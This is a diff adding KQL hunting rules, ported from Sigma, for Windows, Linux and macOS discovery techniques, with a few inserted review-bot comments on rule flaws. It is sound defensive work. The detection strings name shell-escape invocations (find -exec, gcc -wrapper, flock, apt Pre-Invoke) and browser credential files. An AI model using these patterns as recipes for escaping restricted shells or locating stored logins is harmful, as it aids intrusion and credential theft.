+// Tags: attack.discovery, attack.t1518.001
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "nessusd" or ProcessCommandLine contains "td-agent" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "osqueryd" or ProcessCommandLine contains "cbagentd" or ProcessCommandLine contains "falcond") and (FolderPath endswith "/grep" or FolderPath endswith "/egrep")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/security_software_discovery_macos.kql b/KQL/rules/Discovery/security_software_discovery_macos.kql
new file mode 100644
index 00000000..26007344
--- /dev/null
+++ b/KQL/rules/Discovery/security_software_discovery_macos.kql
@@ -0,0 +1,12 @@
+// Title: Security Software Discovery - MacOs
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: medium
+// Description: Detects usage of system utilities (only grep for now) to discover security software discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
+| where FolderPath =~ "/usr/bin/grep" and ((ProcessCommandLine contains "nessusd" or ProcessCommandLine contains "santad" or ProcessCommandLine contains "CbDefense" or ProcessCommandLine contains "falcond" or ProcessCommandLine contains "td-agent" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "osqueryd" or ProcessCommandLine contains "BlockBlock" or ProcessCommandLine contains "LuLu") or (ProcessCommandLine contains "Little" and ProcessCommandLine contains "Snitch"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql b/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql
new file mode 100644
index 00000000..7a8b4c02
--- /dev/null
+++ b/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql
@@ -0,0 +1,12 @@
+// Title: Security Tools Keyword Lookup Via Findstr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2023-10-20
+// Level: medium
+// Description: Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results.
+This detection focuses on the keywords that the attacker might use as a filter.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith " avira" or ProcessCommandLine endswith " avira\"" or ProcessCommandLine endswith " cb" or ProcessCommandLine endswith " cb\"" or ProcessCommandLine endswith " cylance" or ProcessCommandLine endswith " cylance\"" or ProcessCommandLine endswith " defender" or ProcessCommandLine endswith " defender\"" or ProcessCommandLine endswith " kaspersky" or ProcessCommandLine endswith " kaspersky\"" or ProcessCommandLine endswith " kes" or ProcessCommandLine endswith " kes\"" or ProcessCommandLine endswith " mc" or ProcessCommandLine endswith " mc\"" or ProcessCommandLine endswith " sec" or ProcessCommandLine endswith " sec\"" or ProcessCommandLine endswith " sentinel" or ProcessCommandLine endswith " sentinel\"" or ProcessCommandLine endswith " symantec" or ProcessCommandLine endswith " symantec\"" or ProcessCommandLine endswith " virus" or ProcessCommandLine endswith " virus\"") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql b/KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql
new file mode 100644
index 00000000..639d1101
--- /dev/null
+++ b/KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: Share And Session Enumeration Using Net.EXE
+// Author: Endgame, JHasenbusch (ported for oscd.community)
+// Date: 2018-10-30
+// Level: low
+// Description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018
+// False Positives:
+// - Legitimate use of net.exe utility by legitimate user
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "view" and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine contains "\\\\"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/shell_execution_gcc_linux.kql b/KQL/rules/Discovery/shell_execution_gcc_linux.kql
new file mode 100644
index 00000000..f26d978b
--- /dev/null
+++ b/KQL/rules/Discovery/shell_execution_gcc_linux.kql
@@ -0,0 +1,11 @@
+// Title: Shell Execution GCC - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/bash,-s" or ProcessCommandLine contains "/bin/dash,-s" or ProcessCommandLine contains "/bin/fish,-s" or ProcessCommandLine contains "/bin/sh,-s" or ProcessCommandLine contains "/bin/zsh,-s") and (ProcessCommandLine contains "-wrapper" and (FolderPath endswith "/c89" or FolderPath endswith "/c99" or FolderPath endswith "/gcc"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/shell_execution_via_find_linux.kql b/KQL/rules/Discovery/shell_execution_via_find_linux.kql
new file mode 100644
index 00000000..b67ef0be
--- /dev/null
+++ b/KQL/rules/Discovery/shell_execution_via_find_linux.kql
@@ -0,0 +1,11 @@
+// Title: Shell Execution via Find - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and ((ProcessCommandLine contains " . " and ProcessCommandLine contains "-exec") and FolderPath endswith "/find")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/shell_execution_via_flock_linux.kql b/KQL/rules/Discovery/shell_execution_via_flock_linux.kql
new file mode 100644
index 00000000..6c2feb35
--- /dev/null
+++ b/KQL/rules/Discovery/shell_execution_via_flock_linux.kql
@@ -0,0 +1,11 @@
+// Title: Shell Execution via Flock - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains " -u " and FolderPath endswith "/flock")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/shell_execution_via_nice_linux.kql b/KQL/rules/Discovery/shell_execution_via_nice_linux.kql
new file mode 100644
index 00000000..7972f9a9
--- /dev/null
+++ b/KQL/rules/Discovery/shell_execution_via_nice_linux.kql
@@ -0,0 +1,11 @@
+// Title: Shell Execution via Nice - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "/bin/bash" or ProcessCommandLine endswith "/bin/dash" or ProcessCommandLine endswith "/bin/fish" or ProcessCommandLine endswith "/bin/sh" or ProcessCommandLine endswith "/bin/zsh") and FolderPath endswith "/nice"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql b/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql
new file mode 100644
index 00000000..227da4e0
--- /dev/null
+++ b/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql
@@ -0,0 +1,12 @@
+// Title: Shell Invocation via Apt - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: medium
+// Description: Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands.
+Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "APT::Update::Pre-Invoke::=" and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql b/KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql
new file mode 100644
index 00000000..9d0546ef
--- /dev/null
+++ b/KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Active Directory Database Snapshot Via ADExplorer
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-14
+// Level: high
+// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "snapshot" and ((FolderPath endswith "\\ADExp.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADExplorer64a.exe") or ProcessVersionInfoOriginalFileName =~ "AdExp" or ProcessVersionInfoFileDescription =~ "Active Directory Editor" or ProcessVersionInfoProductName =~ "Sysinternals ADExplorer") and (ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_execution_of_hostname.kql b/KQL/rules/Discovery/suspicious_execution_of_hostname.kql
new file mode 100644
index 00000000..25af7557
--- /dev/null
+++ b/KQL/rules/Discovery/suspicious_execution_of_hostname.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of Hostname
+// Author: frack113
+// Date: 2022-01-01
+// Level: low
+// Description: Use of hostname to get information
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where FolderPath endswith "\\HOSTNAME.EXE"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql b/KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql
new file mode 100644
index 00000000..d7e57ab4
--- /dev/null
+++ b/KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of Systeminfo
+// Author: frack113
+// Date: 2022-01-01
+// Level: low
+// Description: Detects usage of the "systeminfo" command to retrieve information
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where FolderPath endswith "\\systeminfo.exe" or ProcessVersionInfoOriginalFileName =~ "sysinfo.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql b/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql
new file mode 100644
index 00000000..863b4d79
--- /dev/null
+++ b/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql
@@ -0,0 +1,15 @@
+// Title: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
+// Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE
+Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001, attack.t1087.002
+// False Positives:
+// - Inventory tool runs
+// - Administrative activity
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ((((ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto" or ProcessCommandLine contains " /do") and (ProcessCommandLine contains " group " or ProcessCommandLine contains " localgroup ")) and (not(ProcessCommandLine contains " /add"))) or (ProcessCommandLine contains " /do" and ProcessCommandLine contains " accounts "))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql b/KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql
new file mode 100644
index 00000000..023b2ff0
--- /dev/null
+++ b/KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Kernel Dump Using Dtrace
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-28
+// Level: high
+// Description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "syscall:::return" and ProcessCommandLine contains "lkd(") or (ProcessCommandLine contains "lkd(0)" and FolderPath endswith "\\dtrace.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_network_command.kql b/KQL/rules/Discovery/suspicious_network_command.kql
new file mode 100644
index 00000000..53201dc7
--- /dev/null
+++ b/KQL/rules/Discovery/suspicious_network_command.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Network Command
+// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
+// Date: 2021-12-07
+// Level: low
+// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016
+// False Positives:
+// - Administrator, hotline ask to user
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "ipconfig\\s+/all" or ProcessCommandLine matches regex "netsh\\s+interface show interface" or ProcessCommandLine matches regex "arp\\s+-a" or ProcessCommandLine matches regex "nbtstat\\s+-n" or ProcessCommandLine matches regex "net\\s+config" or ProcessCommandLine matches regex "route\\s+print"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql b/KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql
new file mode 100644
index 00000000..3e583006
--- /dev/null
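Review bot: In suspicious_network_command.kql, `matches regex` is case-sensitive in KQL, while every other rule in this set gets case-insensitive matching from `contains`, so a command line written with different casing of `ipconfig /all` or `route print` is not covered by `ipconfig\\s+/all` or `route\\s+print`. Prefixing each pattern with the inline flag, e.g. `ProcessCommandLine matches regex "(?i)ipconfig\\s+/all"`, gives this rule the same coverage as the rest of the set. The False Positives line `// - Administrator, hotline ask to user` is carried over verbatim and reads awkwardly; `// - Administrators or helpdesk asking a user to run these commands` says the same thing.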
+++ b/KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Network Connection to IP Lookup Service APIs
+// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-24
+// Level: medium
+// Description: Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016
+// False Positives:
+// - Legitimate use of the external websites for troubleshooting or network monitoring
+
+DeviceNetworkEvents
+| where ((RemoteUrl in~ ("www.ip.cn", "l2.io")) or (RemoteUrl contains "api.2ip.ua" or RemoteUrl contains "api.bigdatacloud.net" or RemoteUrl contains "api.ipify.org" or RemoteUrl contains "bot.whatismyipaddress.com" or RemoteUrl contains "canireachthe.net" or RemoteUrl contains "checkip.amazonaws.com" or RemoteUrl contains "checkip.dyndns.org" or RemoteUrl contains "curlmyip.com" or RemoteUrl contains "db-ip.com" or RemoteUrl contains "edns.ip-api.com" or RemoteUrl contains "eth0.me" or RemoteUrl contains "freegeoip.app" or RemoteUrl contains "geoipy.com" or RemoteUrl contains "getip.pro" or RemoteUrl contains "icanhazip.com" or RemoteUrl contains "ident.me" or RemoteUrl contains "ifconfig.io" or RemoteUrl contains "ifconfig.me" or RemoteUrl contains "ip-api.com" or RemoteUrl contains "ip.360.cn" or RemoteUrl contains "ip.anysrc.net" or RemoteUrl contains "ip.taobao.com" or RemoteUrl contains "ip.tyk.nu" or RemoteUrl contains "ipaddressworld.com" or RemoteUrl contains "ipapi.co" or RemoteUrl contains "ipconfig.io" or RemoteUrl contains "ipecho.net" or RemoteUrl contains "ipinfo.io" or RemoteUrl contains "ipip.net" or RemoteUrl contains "ipof.in" or RemoteUrl contains "ipv4.icanhazip.com" or RemoteUrl contains "ipv4bot.whatismyipaddress.com" or RemoteUrl contains "ipv6-test.com" or RemoteUrl contains "ipwho.is" or RemoteUrl contains "jsonip.com" or RemoteUrl contains 
"myexternalip.com" or RemoteUrl contains "seeip.org" or RemoteUrl contains "wgetip.com" or RemoteUrl contains "whatismyip.akamai.com" or RemoteUrl contains "whois.pconline.com.cn" or RemoteUrl contains "wtfismyip.com")) and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_query_of_machineguid.kql b/KQL/rules/Discovery/suspicious_query_of_machineguid.kql
new file mode 100644
index 00000000..34ef9ca1
--- /dev/null
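Review bot: The whole match in suspicious_network_connection_to_ip_lookup_service_apis.kql keys off `RemoteUrl`, which in DeviceNetworkEvents is only populated when a hostname or URL is associated with the connection; as far as I recall the schema, a connection to one of these services by bare IP carries an empty RemoteUrl and is never seen by this rule. A header comment such as `// Note: matches on RemoteUrl only; connections without an associated hostname are not covered` would make that limit visible to whoever tunes it. Separately, the short `contains` terms (`"ident.me"`, `"eth0.me"`, `"ipof.in"`) will substring-match unrelated hostnames, so expect to extend the browser allow-list with other benign initiators once this runs at scale.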
+++ b/KQL/rules/Discovery/suspicious_query_of_machineguid.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Query of MachineGUID
+// Author: frack113
+// Date: 2022-01-01
+// Level: low
+// Description: Use of reg to get MachineGuid information
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Cryptography" and ProcessCommandLine contains "/v " and ProcessCommandLine contains "MachineGuid") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql b/KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql
new file mode 100644
index 00000000..f6ee94f0
--- /dev/null
+++ b/KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-10
+// Level: medium
+// Description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Get-LocalGroupMember " and (ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql b/KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql
new file mode 100644
index 00000000..80dedcc3
--- /dev/null
+++ b/KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: high
+// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and (not((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_use_of_psloglist.kql b/KQL/rules/Discovery/suspicious_use_of_psloglist.kql
new file mode 100644
index 00000000..0a7c5893
--- /dev/null
+++ b/KQL/rules/Discovery/suspicious_use_of_psloglist.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Use of PsLogList
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-18
+// Level: medium
+// Description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087, attack.t1087.001, attack.t1087.002
+// False Positives:
+// - Another tool that uses the command line switches of PsLogList
+// - Legitimate use of PsLogList by an administrator
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " security" or ProcessCommandLine contains " application" or ProcessCommandLine contains " system") and (ProcessCommandLine contains " -d" or ProcessCommandLine contains " /d" or ProcessCommandLine contains " –d" or ProcessCommandLine contains " —d" or ProcessCommandLine contains " ―d" or ProcessCommandLine contains " -x" or ProcessCommandLine contains " /x" or ProcessCommandLine contains " –x" or ProcessCommandLine contains " —x" or ProcessCommandLine contains " ―x" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " /c" or ProcessCommandLine contains " –c" or ProcessCommandLine contains " —c" or ProcessCommandLine contains " ―c" or ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g" or ProcessCommandLine contains " –g" or ProcessCommandLine contains " —g" or ProcessCommandLine contains " ―g") and (ProcessVersionInfoOriginalFileName =~ "psloglist.exe" or (FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_where_execution.kql b/KQL/rules/Discovery/suspicious_where_execution.kql
new file mode 100644
index 00000000..53b1b25c
--- /dev/null
+++ b/KQL/rules/Discovery/suspicious_where_execution.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Where Execution
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-13
+// Level: low
+// Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts.
+Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about
+internal network resources such as servers, tools/dashboards, or other related infrastructure.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1217
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\where.exe" or ProcessVersionInfoOriginalFileName =~ "where.exe") and (ProcessCommandLine contains "places.sqlite" or ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "formhistory.sqlite" or ProcessCommandLine contains "logins.json" or ProcessCommandLine contains "key4.db" or ProcessCommandLine contains "key3.db" or ProcessCommandLine contains "sessionstore.jsonlz4" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Login Data")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/syskey_registry_keys_access.kql b/KQL/rules/Discovery/syskey_registry_keys_access.kql
new file mode 100644
index 00000000..ddeba016
--- /dev/null
+++ b/KQL/rules/Discovery/syskey_registry_keys_access.kql
@@ -0,0 +1,10 @@
+// Title: SysKey Registry Keys Access
+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-08-12
+// Level: high
+// Description: Detects handle requests and access operations to specific registry keys to calculate the SysKey
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012
+
+DeviceRegistryEvents
+| where RegistryKey endswith "lsa\\JD" or RegistryKey endswith "lsa\\GBG" or RegistryKey endswith "lsa\\Skew1" or RegistryKey endswith "lsa\\Data"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql b/KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql
new file mode 100644
index 00000000..b85dbb89
--- /dev/null
+++ b/KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql
@@ -0,0 +1,10 @@
+// Title: Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE
+// Author: frack113
+// Date: 2021-12-16
+// Level: high
+// Description: Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " 385201" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_information_discovery.kql b/KQL/rules/Discovery/system_information_discovery.kql
new file mode 100644
index 00000000..cc756587
--- /dev/null
+++ b/KQL/rules/Discovery/system_information_discovery.kql
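Review bot: syskey_registry_keys_access.kql says it detects handle requests and access operations, but DeviceRegistryEvents only records key and value creation, modification, rename and deletion (ActionType values such as RegistryKeyCreated and RegistryValueSet), not read or handle-open access; the upstream rule is built on registry object-access auditing, which this table does not carry, as far as I know the schema. As ported, the query only fires if something writes under `lsa\\JD`, `lsa\\GBG`, `lsa\\Skew1` or `lsa\\Data`, which is a different and much rarer event than the one documented. At minimum the header should say so, e.g. `// Note: DeviceRegistryEvents has no read/handle-access events; this only catches modifications of these keys`, and the rule is a candidate for a "not portable to MDE" list rather than a silent port.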
@@ -0,0 +1,12 @@
+// Title: System Information Discovery
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-08
+// Level: informational
+// Description: Detects system information discovery commands
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/uname" or FolderPath endswith "/hostname" or FolderPath endswith "/uptime" or FolderPath endswith "/lspci" or FolderPath endswith "/dmidecode" or FolderPath endswith "/lscpu" or FolderPath endswith "/lsmod"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql b/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql
new file mode 100644
